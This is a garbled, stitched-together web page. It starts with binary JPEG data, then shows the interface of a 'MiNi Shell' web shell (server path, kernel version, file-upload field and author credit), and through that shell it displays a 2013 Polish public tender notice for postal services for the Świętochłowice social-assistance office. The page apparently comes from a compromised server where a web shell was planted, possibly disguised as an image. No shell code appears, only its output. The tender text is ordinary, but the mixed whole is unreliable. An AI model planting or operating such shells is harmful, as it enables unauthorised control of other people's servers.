JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131128/489124-N-2013.html

<p class="kh_header"><b>Świętochłowice: Świadczenie usług pocztowych na rzecz Ośrodka Pomocy Społecznej w Śwętochłowicach</b><br>
<b>Numer ogłoszenia: 489124 - 2013; data zamieszczenia: 28.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-sw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych na rzecz Ośrodka Pomocy Społecznej w Śwętochłowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie powszechnych usług pocztowych w obrocie krajowym
i zagranicznym dla Zamawiającego w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz ich ewentualnych zwrotów( po wyczerpaniu możliwości ich dostarczenia odbiorcy)
w obrocie krajowym i zagranicznym dla Zamawiającego, zwanych dalej usługami.
2.	Usługi pocztowe świadczone będą przez 5 dni w tygodniu (z wyłączeniem dni wolnych od pracy),
od poniedziałku do piątku zgodnie z przepisami obowiązującymi w tym zakresie, to jest m.in.:
1)	ustawą z dnia 23 listopada 2012 roku - Prawo pocztowe ( Dz. U. 2012 poz.1529), zwaną dalej Prawem pocztowym, 
2)	rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 29 kwietnia 2013 roku w sprawie warunków wykonywania usług powszechnych przez operatora wyznaczonego (Dz. U. z 2013 r., poz. 545), zwanym dalej rozporządzeniem,
3)	rozporządzeniem Ministra Infrastruktury z dnia 13 października 2003 r. w sprawie reklamacji powszechnej usługi pocztowej, w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz. U. 2003 r. Nr 183, poz.1795z póżn. zm.).
3.	Zakres usługi obejmuje: 
1)	przesyłki listowe nie rejestrowane ( zwykłe ) krajowe i zagraniczne:
a)	nie będące przesyłkami najszybszej kategorii ( ekonomiczne),
b)	będące przesyłkami najszybszej kategorii ( priorytet), 
2)	przesyłki listowe rejestrowane ( polecone) krajowe :
a)	nie będące przesyłkami najszybszej kategorii( ekonomiczne),
b)	będące przesyłkami najszybszej kategorii ( priorytet),
3)	przesyłki listowe rejestrowane (polecone) krajowe i zagraniczne przyjęte do nadania i doręczenia za poświadczeniem odbioru ( ZPO):
a)	nie będące przesyłkami najszybszej kategorii ( ekonomiczne),
b)	będące przesyłkami najszybszej kategorii ( priorytet),
4)	paczki pocztowe rejestrowane  nie będące przesyłkami najszybszej kategorii ( ekonomiczne).
4.	Usługi pocztowe stanowiące przedmiot zamówienia obejmują następujące rodzaje przesyłek:
1)	przesyłki listowe o wagach: 
a)	- do 350 g gabaryt (A i B)*, 
b)	- powyżej 350 g do 1000 g - gabaryt (A i B)*,
c)	- powyżej 1000g do 2000 g - gabaryt (A i B)*, 
przy czym : 
*Gabaryt A to przesyłki listowe o wymiarach: 
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm, 
Maksimum - żaden z wymiarów nie może przekraczać: wysokość 20mm, długość 325mm, szerokość 230mm. 
*Gabaryt B to przesyłki listowe  o wymiarach: 
Minimum, - jeżeli choć jeden z wymiarów przekracza wysokość (grubość) 20mm lub długość 325 mm, lub szerokość 230 mm, 
Maksimum - suma długości, szerokości i wysokości (grubości) nie przekracza 900 mm, przy czym długość nie może przekroczyć 600 mm. 
2)	paczki o wagach do 6000 g - gabaryt ( A i B)*:
przy czym :
*Gabaryt A to paczki o wymiarach: 
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm, 
Maksimum - żaden z wymiarów nie może przekraczać: wysokość 300mm, długość 600mm, szerokość 500 mm., wysokości 300 mm, 
*Gabaryt B to paczki o wymiarach: 
Minimum - jeżeli choć jeden z wymiarów przekracza długość 600 mm, szerokość 500mm,wysokość 300mm 
Maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość -3000mm, przy czym największy wymiar nie może przekroczyć 1500mm. 
Ustala się tolerancję wszystkich wymiarów +/- 2 mm.
5.	Przewidywane ilości oraz rodzaje przesyłek objęte przedmiotem zamówienia określone zostały
formularzu ofertowym, stanowiącym załącznik nr 1 do niniejszej SIWZ. Wskazane ilości poszczególnych przesyłek są ilościami szacunkowymi, podanymi w celu obliczenia wartości składanych przez Wykonawców ofert oraz ich porównania przez Zamawiającego w toku postępowania o udzielenie zamówienia publicznego. Faktyczna ilość usług będzie wynikać z bieżących potrzeb Zamawiającego, których nie można szczegółowo określić w okresie wszczęcia postępowania i mogą różnić się od podanych w formularzu cenowym. Wykonawcy nie przysługuje roszczenie wynikające ze zmian ilościowych i rodzajowych w trakcie realizacji zamówienia.
6.	Przyjmowanie przesyłek dostarczonych przez Zamawiającego będzie następowało w siedzibie Wykonawcy ( punkcie obsługi klienta), znajdującej się na terenie miasta Świętochłowice.
7.	Przesyłki będą przyjmowane codziennie od poniedziałku do piątku (z wyłączeniem dni wolnych od pracy) w godzinach od 14:00 do 15:00. Odbioru będzie dokonywać upoważniony pracownik Wykonawcy.
8.	Doręczanie przesyłek listowych ze zwrotnym potwierdzeniem odbioru ( ZPO) Wykonawca będzie realizować w trybie określonym w art. 42-48 ustawy z dnia 14 czerwca 1960 r. Kodeksu postępowania administracyjnego ( tekst jednolity : Dz. U. z 2013 r. poz. 267).
9.	Ze względu na szczególne znaczenie dla Zamawiającego doręczeń, o których mowa w ust. 8, Wykonawca zobowiązany jest usługi te realizować i dokumentować prawidłowo, tj.:
1)	Wykonawca będzie doręczał do Zamawiającego potwierdzenie odbioru przesyłki przez adresata niezwłocznie po dokonaniu doręczenia przesyłki,
2)	w przypadku nieobecności adresata przesyłki Wykonawca pozostawi zawiadomienie ( pierwsze awizo) o próbie doręczenia przesyłki, ze wskazaniem gdzie i kiedy adresat może odebrać przesyłkę
(termin do odbioru przesyłki przez adresata wynosi 7 dni, liczonych od dnia pozostawienia pierwszego zawiadomienia); W przypadku niepodjęcia przesyłki w tym terminie, przesyłka będzie awizowana  powtórnie (drugie awizo) poprzez pozostawienie drugiego zawiadomienia
o możliwości odbioru przesyłki w terminie nie dłuższym niż 14 dni od daty pierwszego zawiadomienia; Po upływie 14 dniowego terminu odbioru, Wykonawca zwróci przesyłkę Zamawiającemu z podaniem przyczyny niedoręczenia adresatowi,
3)	ze względu na charakter spraw prowadzonych przez Zamawiającego, wymaga się, aby Wykonawca dysponował prawem do wydawania potwierdzenia nadania przesyłki rejestrowanej z mocą dokumentu urzędowego.
       Zamawiający formularze potwierdzenia odbioru nabywa we własnym zakresie i na własny koszt.
10.	Usługę pocztową w zakresie przesyłki rejestrowanej uważa się za niewykonaną, jeżeli doręczenie przesyłki rejestrowanej lub zawiadomienie o próbie jej doręczenia nie nastąpiło w terminie 14 dni od dnia nadania, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 13 października 2003 r.
w sprawie reklamacji powszechnej usługi pocztowej, w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz. U. 2003 r., poz.1795). Do odpowiedzialności Wykonawcy za nienależyte wykonanie usługi pocztowej stosuje się odpowiednio przepisy ustawy Prawo pocztowe oraz rozporządzenia Ministra Infrastruktury z dnia 13 października 2003 r. w sprawie reklamacji powszechnej usługi pocztowej, w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz. U. 2003 r., poz. 1795 z póz. zm.), a w sprawach nieuregulowanych tymi przepisami stosuje się odpowiednio przepisy ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U. Nr 16 poz. 93 z pózn. zm.). 
11.	Zamawiający zobowiązuje się do;
1)	opakowania przesyłek w sposób umożliwiający Wykonawcy ich doręczenia bez ubytku
i uszkodzenia do miejsca zgodnego z adresem przeznaczenia,
2)	umieszczania na przesyłkach nazwy odbiorcy wraz z jego adresem (podawanym jednocześnie
w książce nadawczej dla przesyłek rejestrowanych (poleconych) określając rodzaj przesyłki
(ekonomiczna, priorytet, zwrotne potwierdzenie odbioru), umieszczania pieczątki z pełna nazwą Zamawiającego na stronie adresowej przesyłki oraz oznaczenie potwierdzające wniesienie opłaty za usługę w postaci napisu, nadruku lub odcisku pieczęci o treści ustalonej z Wykonawcą,
3)	uporządkowania przesyłek do nadania, tj. posortowania wg kategorii, wag i rozmiarów oraz przekazania zgodnie z kolejnością wpisów w książce nadawczej,
4)	sporządzenia w dwóch egzemplarzach książki nadawczej dla przesyłek rejestrowanych i nie rejestrowanych oraz zestawień ilościowo- wartościowych dla przesyłek rejestrowanych i nie rejestrowanych, stanowiących podstawę do wzajemnych rozliczeń.
      Wykonawca zobowiązuje się - w przypadku uszkodzenia przesyłki- do jej zabezpieczenia i naniesienia
     adnotacji z informacją o sposobie dokonania zabezpieczenia.
12.	Wykonawca będzie doręczał przesyłki krajowe zaliczone do powszechnych usług pocztowych
z zachowaniem wskaźników terminowości doręczeń przesyłek w obrocie krajowym wskazanym
w rozporządzeniu ( ust. 2 pkt 2 niniejszego paragrafu ).
13.	Uiszczanie opłat od przesyłek listowych będzie następowało z dołu w formie opłaty skredytowanej. Podstawą obliczenia należności będzie suma opłat za przesyłki faktycznie nadane lub zwrócone
z powodu braku możliwości ich doręczenia w okresie rozliczeniowym, potwierdzona, co do ich liczby
i wagi na podstawie dokumentów nadawczych lub oddawczych, przy czym obowiązywać będą ceny jednostkowe podane w Formularzu cenowym ( załącznik Nr 1 do SIWZ). Ceny określone w Formularzu cenowym powinny zawierać wszystkie opłaty Wykonawcy.
14.	Zamawiający za okres rozliczeniowy do fakturowania uznaje miesiąc kalendarzowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca prowadził działalność pocztową w zakresie przyjmowania, przemieszczania i doręczania przesyłek w obrocie krajowym i zagranicznym na podstawie aktualnego zezwolenia wydanego przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z art. 8 ustawy Prawo pocztowe, 
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający wymaga, aby Wykonawca przedstawił wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, odpowiadających swoim zakresem przedmiotowi niniejszego zamówienia,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
W celu weryfikacji rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawcy, Zamawiający wymaga wskazania wykonanej co najmniej jednej usługi o wartości nie mniejszej niż 50.000,00 (słownie złotych : pięćdziesiąt tysięcy).
Warunek zostanie spełniony, gdy Wykonawca wskaże co najmniej jedną  usługę ujętą w wykazie ( załącznik nr 4 do SIWZ) polegającą na świadczeniu usług w obrocie pocztowym w zakresie przyjmowania, przemieszczania i doręczania przesyłek o wartości nie mniejszej niż 50 000,00 zł brutto i załączy  dowody określające, czy usługa ta została wykonana lub jest wykonywana należycie.
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zmawiający uzna warunek za spełniony, jeżeli Wykonawca złoży podpisane oświadczenie 
o spełnieniu warunków udziału w postępowaniu, o których mowa w art., 22 ust. 1 ustawy Pzp ( załącznik nr 2 do SIWZ),
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zmawiający uzna warunek za spełniony, jeżeli Wykonawca złoży podpisane oświadczenie 
o spełnieniu warunków udziału w postępowaniu, o których mowa w art., 22 ust. 1 ustawy Pzp ( załącznik nr 2 do SIWZ),
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zmawiający uzna warunek za spełniony, jeżeli Wykonawca złoży podpisane oświadczenie 
o spełnieniu warunków udziału w postępowaniu, o których mowa w art., 22 ust. 1 ustawy Pzp ( załącznik nr 2 do SIWZ),
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje, zgodnie z zapisami Pzp, możliwość zmiany umowy w przypadku zmiany Regulaminu usług pocztowych Wykonawcy o ile zmiany te będą korzystne dla Zamawiającego.
Wszelkie zmiany do umowy wymagają pod rygorem nieważności, zachowania formy pisemnej w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-sw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 09:00, miejsce: Świętochłowice, ul. Katowicka 35, pokój 307.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com